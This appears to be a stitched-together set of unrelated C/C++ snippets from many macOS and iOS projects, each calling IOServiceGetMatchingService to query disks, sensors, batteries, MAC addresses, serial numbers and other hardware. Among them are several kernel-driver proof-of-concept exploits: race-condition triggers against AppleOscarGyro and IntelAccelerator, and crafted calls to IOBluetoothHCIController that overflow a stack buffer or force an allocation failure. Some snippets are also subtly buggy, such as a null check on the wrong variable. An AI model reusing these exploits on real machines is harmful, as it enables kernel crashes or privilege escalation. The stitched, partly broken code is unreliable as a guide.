off_t diskfile_device_size(const char *path) {
// Get the path within /dev
if (strncmp(path, DEV_PREFIX, strlen(DEV_PREFIX)) != 0)
return 0;
const char *bsdname = path + strlen(DEV_PREFIX);
// Find the matching IOService
CFMutableDictionaryRef matching = IOBSDNameMatching(kIOMasterPortDefault, 0,
bsdname);
// Consumes the matching dictionary
io_service_t match = IOServiceGetMatchingService(kIOMasterPortDefault,
matching);
if (!match)
return 0;
// Get the size property
CFNumberRef cfsize = IORegistryEntryCreateCFProperty(match,
CFSTR(kIOMediaSizeKey), kCFAllocatorDefault, 0);
IOObjectRelease(match);
if (!cfsize)
return 0;
long long size;
if (!CFNumberGetValue(cfsize, kCFNumberLongLongType, &size))
return 0;
return size;
}
io_connect_t getDataPort(void)
{
kern_return_t kr;
io_service_t serviceObject;
if (dataPort) return dataPort;
// Look up a registered IOService object whose class is AppleLMUController
serviceObject = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleLMUController"));
if (!serviceObject)
{
printf("getLightSensors() error: failed to find ambient light sensor\n");
return 0;
}
// Create a connection to the IOService object
kr = IOServiceOpen(serviceObject, mach_task_self(), 0, &dataPort);
IOObjectRelease(serviceObject);
if (kr != KERN_SUCCESS)
{
printf("getLightSensors() error: failed to open IoService object\n");
return 0;
}
return dataPort;
}
static HRESULT get_ff(IOHIDDeviceRef device, FFDeviceObjectReference *ret)
{
io_service_t service;
CFMutableDictionaryRef matching;
CFTypeRef type;
matching = IOServiceMatching(kIOHIDDeviceKey);
if(!matching) {
WARN("IOServiceMatching failed, force feedback disabled\n");
return DIERR_DEVICENOTREG;
}
type = IOHIDDeviceGetProperty(device, CFSTR(kIOHIDLocationIDKey));
if(!matching) {
CFRelease(matching);
WARN("IOHIDDeviceGetProperty failed, force feedback disabled\n");
return DIERR_DEVICENOTREG;
}
CFDictionaryAddValue(matching, CFSTR(kIOHIDLocationIDKey), type);
service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
if(!ret)
return FFIsForceFeedback(service) == FF_OK ? S_OK : S_FALSE;
return osx_to_win32_hresult(FFCreateDevice(service, ret));
}
//---------------------------------------------------------------------------------
//
// AllocateHIDObjectFromIOHIDDeviceRef( )
//
// returns:
// NULL, or acceptable io_object_t
//
//---------------------------------------------------------------------------------
io_service_t AllocateHIDObjectFromIOHIDDeviceRef(IOHIDDeviceRef inIOHIDDeviceRef) {
io_service_t result = 0L;
if ( inIOHIDDeviceRef ) {
// Set up the matching criteria for the devices we're interested in.
// We are interested in instances of class IOHIDDevice.
// matchingDict is consumed below( in IOServiceGetMatchingService )
// so we have no leak here.
CFMutableDictionaryRef matchingDict = IOServiceMatching(kIOHIDDeviceKey);
if ( matchingDict ) {
// Add a key for locationID to our matching dictionary. This works for matching to
// IOHIDDevices, so we will only look for a device attached to that particular port
// on the machine.
CFTypeRef tCFTypeRef = IOHIDDeviceGetProperty( inIOHIDDeviceRef, CFSTR(kIOHIDLocationIDKey) );
if ( tCFTypeRef ) {
CFDictionaryAddValue(matchingDict, CFSTR(kIOHIDLocationIDKey), tCFTypeRef);
// CFRelease( tCFTypeRef ); // don't release objects that we "Get".
// IOServiceGetMatchingService assumes that we already know that there is only one device
// that matches. This way we don't have to do the whole iteration dance to look at each
// device that matches. This is a new API in 10.2
result = IOServiceGetMatchingService(kIOMasterPortDefault, matchingDict);
}
// Note: We're not leaking the matchingDict.
// One reference is consumed by IOServiceGetMatchingServices
}
}
return (result);
} // AllocateHIDObjectFromIOHIDDeviceRef
static int darwin_init(void)
{
kern_return_t err;
/* Note the actual security happens in the kernel module.
* This check is just candy to be able to get nicer output
*/
if (getuid() != 0) {
/* Fun's reserved for root */
errno = EPERM;
return -1;
}
/* Get the DirectHW driver service */
iokit_uc = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("DirectHWService"));
if (!iokit_uc) {
printf("DirectHW.kext not loaded.\n");
errno = ENOSYS;
return -1;
}
/* Create an instance */
err = IOServiceOpen(iokit_uc, mach_task_self(), 0, &connect);
/* Should not go further if error with service open */
if (err != KERN_SUCCESS) {
printf("Could not create DirectHW instance.\n");
errno = ENOSYS;
return -1;
}
return 0;
}
CFStringRef copy_device_imei() {
CFMutableDictionaryRef matching;
io_service_t service;
CFDataRef imeiData;
const void *imeiDataPtr;
CFStringRef imeiString;
matching = IOServiceNameMatching("baseband");
service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
if(!service) {
return NULL;
}
imeiData = IORegistryEntryCreateCFProperty(service, CFSTR("device-imei"), kCFAllocatorDefault, 0);
if(!imeiData) {
printf("unable to find device-imei property\n");
IOObjectRelease(service);
return NULL;
}
imeiDataPtr = CFDataGetBytePtr(imeiData);
imeiString = CFStringCreateWithCString(kCFAllocatorDefault, imeiDataPtr, kCFStringEncodingUTF8);
CFRelease(imeiData);
IOObjectRelease(service);
return imeiString;
}
static io_connect_t connect_to_keystore(void)
{
io_registry_entry_t apple_key_bag_service;
kern_return_t result;
io_connect_t keystore = MACH_PORT_NULL;
apple_key_bag_service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching(kAppleKeyStoreServiceName));
if (apple_key_bag_service == IO_OBJECT_NULL) {
fprintf(stderr, "Failed to get service.\n");
return keystore;
}
result = IOServiceOpen(apple_key_bag_service, mach_task_self(), 0, &keystore);
if (KERN_SUCCESS != result)
fprintf(stderr, "Failed to open keystore\n");
if (keystore != MACH_PORT_NULL) {
IOReturn kernResult = IOConnectCallMethod(keystore,
kAppleKeyStoreUserClientOpen, NULL, 0, NULL, 0, NULL, NULL,
NULL, NULL);
if (kernResult) {
fprintf(stderr, "Failed to open AppleKeyStore: %x\n", kernResult);
}
}
return keystore;
}
uint16_t OSX_ProbeTargetDrive(const char* id3args_drive, char* mcdi_data) {
uint16_t mcdi_data_len = 0;
io_object_t cdobject = MACH_PORT_NULL;
if (strncmp(id3args_drive, "disk", 4) != 0) {
OSX_ScanForCDDrive();
exit(0);
}
cdobject = IOServiceGetMatchingService(kIOMasterPortDefault, IOBSDNameMatching (kIOMasterPortDefault, 0, id3args_drive) );
if (cdobject == MACH_PORT_NULL) {
fprintf(stdout, "No device found at %s; searching for possible drives...\n", id3args_drive);
OSX_ScanForCDDrive();
} else if (IOObjectConformsTo(cdobject, kIOCDMediaClass) == false) {
fprintf (stdout, "No cd present in drive at %s\n", id3args_drive );
IOObjectRelease(cdobject);
cdobject = MACH_PORT_NULL;
OSX_ScanForCDDrive();
} else {
//we now have a cd object
OSX_ReadCDTOC(cdobject);
if (cdTOC != NULL) {
uint8_t cdType = DetermineCDType(cdTOC);
if (cdType == CDOBJECT_AUDIOCD) {
mcdi_data_len = FormMCDIdata(mcdi_data);
}
}
}
IOObjectRelease(cdobject);
cdobject = MACH_PORT_NULL;
return mcdi_data_len;
}
int getPstateTable(PSTATE_CTL_INFO* info){
int count = 0;
io_service_t IOService = IOServiceGetMatchingService(0, IOServiceMatching(SERVICE_NAME));
if (! IOService )
return 0;
CFDictionaryRef CDictionary = (CFDictionaryRef) IORegistryEntryCreateCFProperty(IOService,
CFSTR("Characteristics"),kCFAllocatorDefault,0);
CFArrayRef PSArray = CFArrayCreateCopy(kCFAllocatorDefault,
(CFArrayRef) CFDictionaryGetValue(CDictionary, CFSTR("PStates")));
if (PSArray) {
count = CFArrayGetCount(PSArray);
for( int k = 0; k < count; k++ ){
CFDictionaryRef PSDictionary = CFDictionaryCreateCopy(kCFAllocatorDefault,
(CFDictionaryRef) CFArrayGetValueAtIndex(PSArray, k));
info->frequency = GetNumber(CFSTR("Frequency"), PSDictionary);
info->voltage = GetNumber(CFSTR("Voltage"), PSDictionary);
info->fid = GetNumber(CFSTR("FID"), PSDictionary);
info->did = GetNumber(CFSTR("DID"), PSDictionary);
info->vid = GetNumber(CFSTR("VID"), PSDictionary);
info->pstate = k;
info++;
CFRelease(PSDictionary);
}
CFRelease(PSArray);
}
CFRelease(CDictionary);
return count;
}
int main(int argc, char** argv) {
char* service_name = "AppleOscarGyro";
int client_type = 0;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(service_name));
if (service == MACH_PORT_NULL) {
printf("can't find service\n");
return 0;
}
IOServiceOpen(service, mach_task_self(), client_type, &conn);
if (conn == MACH_PORT_NULL) {
printf("can't connect to service\n");
return 0;
}
OSSpinLockLock(&lock);
pthread_t t;
io_connect_t arg = conn;
pthread_create(&t, NULL, (void*) go, (void*) &arg);
usleep(100000);
OSSpinLockUnlock(&lock);
close_it(conn);
pthread_join(t, NULL);
return 0;
}
int main(int argc, char** argv) {
char* service_name = "IntelAccelerator";
int client_type = 4;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(service_name));
if (service == MACH_PORT_NULL) {
printf("can't find service\n");
return 0;
}
IOServiceOpen(service, mach_task_self(), client_type, &conn);
if (conn == MACH_PORT_NULL) {
printf("can't connect to service\n");
return 0;
}
pthread_t t;
io_connect_t arg = conn;
pthread_create(&t, NULL, (void*) go, (void*) &arg);
usleep(100000);
start = 1;
close_it(conn);
pthread_join(t, NULL);
return 0;
}
void genFDEStatusForBSDName(const std::string& bsd_name,
const std::string& uuid,
QueryData& results) {
auto matching_dict =
IOBSDNameMatching(kIOMasterPortDefault, kNilOptions, bsd_name.c_str());
if (matching_dict == nullptr) {
CFRelease(matching_dict);
return;
}
auto service =
IOServiceGetMatchingService(kIOMasterPortDefault, matching_dict);
if (!service) {
IOObjectRelease(service);
return;
}
CFMutableDictionaryRef properties;
IORegistryEntryCreateCFProperties(
service, &properties, kCFAllocatorDefault, kNilOptions);
Row r;
r["name"] = kDeviceNamePrefix + bsd_name;
r["uuid"] = uuid;
auto encrypted = getIOKitProperty(properties, kCoreStorageIsEncryptedKey_);
r["encrypted"] = (encrypted.empty()) ? "0" : encrypted;
r["type"] = (r.at("encrypted") == "1") ? kEncryptionType : std::string();
results.push_back(r);
CFRelease(properties);
IOObjectRelease(service);
}
QueryData genACPITables(QueryContext& context) {
QueryData results;
auto matching = IOServiceMatching(kIOACPIClassName_);
if (matching == nullptr) {
// No ACPI platform expert service found.
return {};
}
auto service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
if (service == 0) {
return {};
}
CFTypeRef table = IORegistryEntryCreateCFProperty(
service, CFSTR(kIOACPIPropertyName_), kCFAllocatorDefault, 0);
if (table == nullptr) {
IOObjectRelease(service);
return {};
}
CFDictionaryApplyFunction((CFDictionaryRef)table, genACPITable, &results);
CFRelease(table);
IOObjectRelease(service);
return results;
}
std::string LLAppViewerMacOSX::generateSerialNumber()
{
char serial_md5[MD5HEX_STR_SIZE]; // Flawfinder: ignore
serial_md5[0] = 0;
// JC: Sample code from http://developer.apple.com/technotes/tn/tn1103.html
CFStringRef serialNumber = NULL;
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert) {
serialNumber = (CFStringRef) IORegistryEntryCreateCFProperty(platformExpert,
CFSTR(kIOPlatformSerialNumberKey),
kCFAllocatorDefault, 0);
IOObjectRelease(platformExpert);
}
if (serialNumber)
{
char buffer[MAX_STRING]; // Flawfinder: ignore
if (CFStringGetCString(serialNumber, buffer, MAX_STRING, kCFStringEncodingASCII))
{
LLMD5 md5( (unsigned char*)buffer );
md5.hex_digest(serial_md5);
}
CFRelease(serialNumber);
}
return serial_md5;
}
CFStringRef copy_bluetooth_mac_address() {
io_service_t service;
CFDataRef macaddrData;
CFStringRef macaddr;
unsigned char macaddrBytes[6];
service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("bluetooth"));
if(!service) {
printf("unable to find bluetooth service\n");
return NULL;
}
macaddrData= IORegistryEntryCreateCFProperty(service, CFSTR("local-mac-address"), kCFAllocatorDefault, 0);
if(macaddrData == NULL) {
printf("bluetooth local-mac-address not found\n");
IOObjectRelease(service);
return NULL;
}
CFDataGetBytes(macaddrData, CFRangeMake(0,6), macaddrBytes);
macaddr = CFStringCreateWithFormat(kCFAllocatorDefault,
NULL,
CFSTR("%02x:%02x:%02x:%02x:%02x:%02x"),
macaddrBytes[0],
macaddrBytes[1],
macaddrBytes[2],
macaddrBytes[3],
macaddrBytes[4],
macaddrBytes[5]);
return macaddr;
}
UIOHOOK_API long int hook_get_pointer_acceleration_multiplier() {
#if defined USE_IOKIT || defined USE_COREFOUNDATION
bool successful = false;
double multiplier;
#endif
long int value = -1;
#ifdef USE_IOKIT
if (!successful) {
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(kIOHIDSystemClass));
if (service) {
kern_return_t kren_ret = kIOReturnError;
io_connect_t connection;
kren_ret = IOServiceOpen(service, mach_task_self(), kIOHIDParamConnectType, &connection);
if (kren_ret == kIOReturnSuccess) {
// IOByteCount size = sizeof(multiplier);
kren_ret = IOHIDGetAccelerationWithKey(connection, CFSTR(kIOHIDMouseAccelerationType), &multiplier);
if (kren_ret == kIOReturnSuccess) {
// Calculate the greatest common factor.
unsigned long denominator = 1000000, d = denominator;
unsigned long numerator = multiplier * denominator, gcf = numerator;
while (d != 0) {
unsigned long i = gcf % d;
gcf = d;
d = i;
}
value = denominator / gcf;
successful = true;
logger(LOG_LEVEL_INFO, "%s [%u]: IOHIDGetAccelerationWithKey: %li.\n",
__FUNCTION__, __LINE__, value);
}
}
}
}
#endif
#ifdef USE_COREFOUNDATION
if (!successful) {
CFTypeRef pref_val = CFPreferencesCopyValue(CFSTR("com.apple.mouse.scaling"), kCFPreferencesAnyApplication, kCFPreferencesCurrentUser, kCFPreferencesAnyHost);
if (pref_val != NULL && CFGetTypeID(pref_val) == CFNumberGetTypeID()) {
if (CFNumberGetValue((CFNumberRef) pref_val, kCFNumberSInt32Type, &multiplier)) {
value = (long) multiplier;
logger(LOG_LEVEL_INFO, "%s [%u]: CFPreferencesCopyValue: %li.\n",
__FUNCTION__, __LINE__, value);
}
}
}
#endif
return value;
}
CFStringRef lookup_mac_address(const char* serviceName)
{
unsigned char macaddrBytes[6];
CFStringRef res = NULL;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching(serviceName));
if(service)
{
CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("local-mac-address"), kCFAllocatorDefault, 0);
if(macData != NULL)
{
CFDataGetBytes(macData, CFRangeMake(0,6), macaddrBytes);
res = CFStringCreateWithFormat(kCFAllocatorDefault,
NULL,
CFSTR("%02x:%02x:%02x:%02x:%02x:%02x"),
macaddrBytes[0],
macaddrBytes[1],
macaddrBytes[2],
macaddrBytes[3],
macaddrBytes[4],
macaddrBytes[5]);
CFRelease(macData);
}
IOObjectRelease(service);
}
return res;
}
io_connect_t connectSmartBatteryManager(uint32_t options, IOReturn *outret)
{
io_service_t smartbattman_entry = MACH_PORT_NULL;
io_connect_t manager_connect = MACH_PORT_NULL;
IOReturn ret;
smartbattman_entry = IOServiceGetMatchingService( MACH_PORT_NULL,
IOServiceNameMatching(kBatteryManagerName) );
if (MACH_PORT_NULL == smartbattman_entry) {
return MACH_PORT_NULL;
}
ret = IOServiceOpen( smartbattman_entry, /* service */
mach_task_self(), /* owning task */
options, /* type - kBatteryExclusiveAccessType or not*/
&manager_connect); /* connect */
if (outret) *outret = ret;
if(kIOReturnSuccess != ret) {
return MACH_PORT_NULL;
}
IOObjectRelease(smartbattman_entry);
return manager_connect;
}
/*
* Given disk2s1, look up "disk2" is IOKit and attempt to determine if
* it is an optical device.
*/
int is_optical_media(const char *bsdname)
{
CFMutableDictionaryRef matchingDict;
int ret = 0;
io_service_t service, start;
kern_return_t kernResult;
io_iterator_t iter;
if ((matchingDict = IOBSDNameMatching(kIOMasterPortDefault, 0, bsdname)) == NULL)
return(0);
start = IOServiceGetMatchingService(kIOMasterPortDefault, matchingDict);
if (IO_OBJECT_NULL == start)
return (0);
service = start;
// Create an iterator across all parents of the service object passed in.
// since only disk2 would match with ConfirmsTo, and not disk2s1, so
// we search the parents until we find "Whole", ie, disk2.
kernResult = IORegistryEntryCreateIterator(service,
kIOServicePlane,
kIORegistryIterateRecursively | kIORegistryIterateParents,
&iter);
if (KERN_SUCCESS == kernResult) {
Boolean isWholeMedia = false;
IOObjectRetain(service);
do {
// Lookup "Whole" if we can
if (IOObjectConformsTo(service, kIOMediaClass)) {
CFTypeRef wholeMedia;
wholeMedia = IORegistryEntryCreateCFProperty(service,
CFSTR(kIOMediaWholeKey),
kCFAllocatorDefault,
0);
if (wholeMedia) {
isWholeMedia = CFBooleanGetValue(wholeMedia);
CFRelease(wholeMedia);
}
}
// If we found "Whole", check the service type.
if (isWholeMedia &&
( (IOObjectConformsTo(service, kIOCDMediaClass)) ||
(IOObjectConformsTo(service, kIODVDMediaClass)) )) {
ret = 1; // Is optical, skip
}
IOObjectRelease(service);
} while ((service = IOIteratorNext(iter)) && !isWholeMedia);
IOObjectRelease(iter);
}
IOObjectRelease(start);
return ret;
}
void setPstate(unsigned int newState){
io_service_t IOService = IOServiceGetMatchingService(0, IOServiceMatching(SERVICE_NAME));
if (! IOService )
return;
integer_t state = newState;
IORegistryEntrySetCFProperty(IOService, CFSTR("P-State"),
CFNumberCreate(kCFAllocatorDefault, kCFNumberIntType, &state));
}
io_service_t
fake_IOServiceGetMatchingService(
mach_port_t _masterPort,
CFDictionaryRef matching )
{
io_service_t ret = IOServiceGetMatchingService(_masterPort, matching);
printf("IOServiceGetMatchingService(matching=%p) ret: %x\n", matching, ret);
return ret;
}
/*! Gets the iSCSIVirtualHBA object in the IO registry.*/
io_object_t iSCSIIORegistryGetiSCSIHBAEntry()
{
// Create a dictionary to match iSCSIkext
CFMutableDictionaryRef matchingDict = NULL;
matchingDict = IOServiceMatching(kiSCSIVirtualHBA_IOClassName);
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,matchingDict);
return service;
}
void reset_baseband() {
printf("Resetting baseband\n");
io_connect_t connect = 0;
CFMutableDictionaryRef match = IOServiceMatching("AppleBaseband");
io_service_t service = IOServiceGetMatchingService(0, match);
IOServiceOpen(service, mach_task_self(), 0, &connect);
IOConnectCallScalarMethod(connect, 0, 0, 0, 0, 0);
IOServiceClose(connect);
sleep(1);
}
/* sub_e568 */
void setup_watchdog_timer(int value)
{
io_service_t timerservice = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOWatchDogTimer"));
if (timerservice != 0) {
CFNumberRef cfval = CFNumberCreate(kCFAllocatorDefault, kCFNumberIntType, &value);
IORegistryEntrySetCFProperties(timerservice, cfval);
IOObjectRelease(timerservice);
CFRelease(cfval);
}
}
void resetBaseband() {
LOG(LOGLEVEL_INFO, "Resetting baseband...\n");
mach_port_t masterPort;
kern_return_t result = IOMasterPort(MACH_PORT_NULL, &masterPort);
CFMutableDictionaryRef matchingDict = IOServiceMatching("AppleBaseband");
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matchingDict);
io_connect_t conn;
result = IOServiceOpen(service, mach_task_self(), 0, &conn);
result = IOConnectCallScalarMethod(conn, 0, 0, 0, 0, 0);
IOServiceClose(conn);
}
/*
* Find a matching IOService for a USB device
*
* idVendor - USB device vendor
* idProduct - USB device product
*
* returns io_service_t or 0 on error
*/
io_service_t findMatchingService(const unsigned short idVendor, const unsigned short idProduct)
{
CFDictionaryRef matchingDictionary = getMatchingDictionary(idVendor, idProduct);
if (matchingDictionary == NULL)
{
fprintf(stderr, "[!] Failed to initialize device matching dictionary.\n");
return 0;
}
return IOServiceGetMatchingService(kIOMasterPortDefault, matchingDictionary);
}
kern_return_t SMCOpen(void)
{
kern_return_t result;
mach_port_t masterPort;
io_iterator_t iterator;
io_object_t device;
result = IOMasterPort(MACH_PORT_NULL, &masterPort);
CFMutableDictionaryRef matchingDictionary = IOServiceMatching("AppleSMC");
result = IOServiceGetMatchingServices(masterPort, matchingDictionary, &iterator);
if (result != kIOReturnSuccess)
{
printf("Error: IOServiceGetMatchingServices() = %08x\n", result);
return 1;
}
device = IOIteratorNext(iterator);
IOObjectRelease(iterator);
if (device == 0)
{
printf("Error: no SMC found\n");
return 1;
}
result = IOServiceOpen(device, mach_task_self(), 0, &conn);
IOObjectRelease(device);
if (result != kIOReturnSuccess)
{
printf("Error: IOServiceOpen() = %08x\n", result);
return 1;
}
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert) {
CFTypeRef CFProductData = IORegistryEntryCreateCFProperty(platformExpert,
CFSTR("product-name"),
kCFAllocatorDefault, 0);
if (CFProductData) {
CFIndex length = CFDataGetLength((CFDataRef)CFProductData);
char buffer[length];
CFDataGetBytes((CFDataRef) CFProductData, CFRangeMake(0,length), (UInt8*)buffer);
CFRelease(CFProductData);
modelNo = *new std::string(buffer);
}
IOObjectRelease(platformExpert);
}
return kIOReturnSuccess;
}
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
a.sizes[0] = 0x1000;
a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));
/* This arguments overflows a local buffer and the adjacent stack canary */
a.sizes[1] = 264;
a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
memset((void *)a.args[1], 'A', a.sizes[1]);
/* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
a.index = 0x2d;
/* Debug */
for(int i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
fflush(stdout);
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
// On Dual-GPU Macbook Pros, Apple's Screensaver Engine
// will detect any GPU change and call stopAnimation,
// then initWithFrame and startAnimation.
//
// When we launch boincscr or a project screensaver
// app which uses OpenGL, that will trigger a switch to
// the discrete GPU, causing the Screensaver Engine to
// call stopAnimation, which will then shut down boincscr
// or the project screensaver. This will then release
// the discrete GPU, triggering a switch to the intrinsic
// GPU, which will again cause a call to stopAnimation,
// and so forth in an infinite loop.
//
// The solution is to request the discrete GPU ourselves
// before launching boincscr or a project screensaver so
// the OpenGL app does not cause a GPU switch.
//
// We initially call this with setDiscrete = false to
// test whether we are running on a Dual-GPU Macbook Pro.
//
void CScreensaver::SetDiscreteGPU(bool setDiscrete) {
kern_return_t kernResult = 0;
io_service_t service = IO_OBJECT_NULL;
if (GPUSelectConnect == IO_OBJECT_NULL) {
service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleGraphicsControl"));
if (service != IO_OBJECT_NULL) {
kernResult = IOServiceOpen(service, mach_task_self(), setDiscrete ? 1 : 0, &GPUSelectConnect);
if (kernResult == KERN_SUCCESS) {
IsDualGPUMacbook = true;
}
}
}
}
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
int i;
for (i=0; i<7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* This value causes IOMalloc() to fail */
a.args[6] = 0x0;
a.sizes[6] = 0x80000041;
a.index = 0x06; /* DispatchHCICreateConnection() */
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
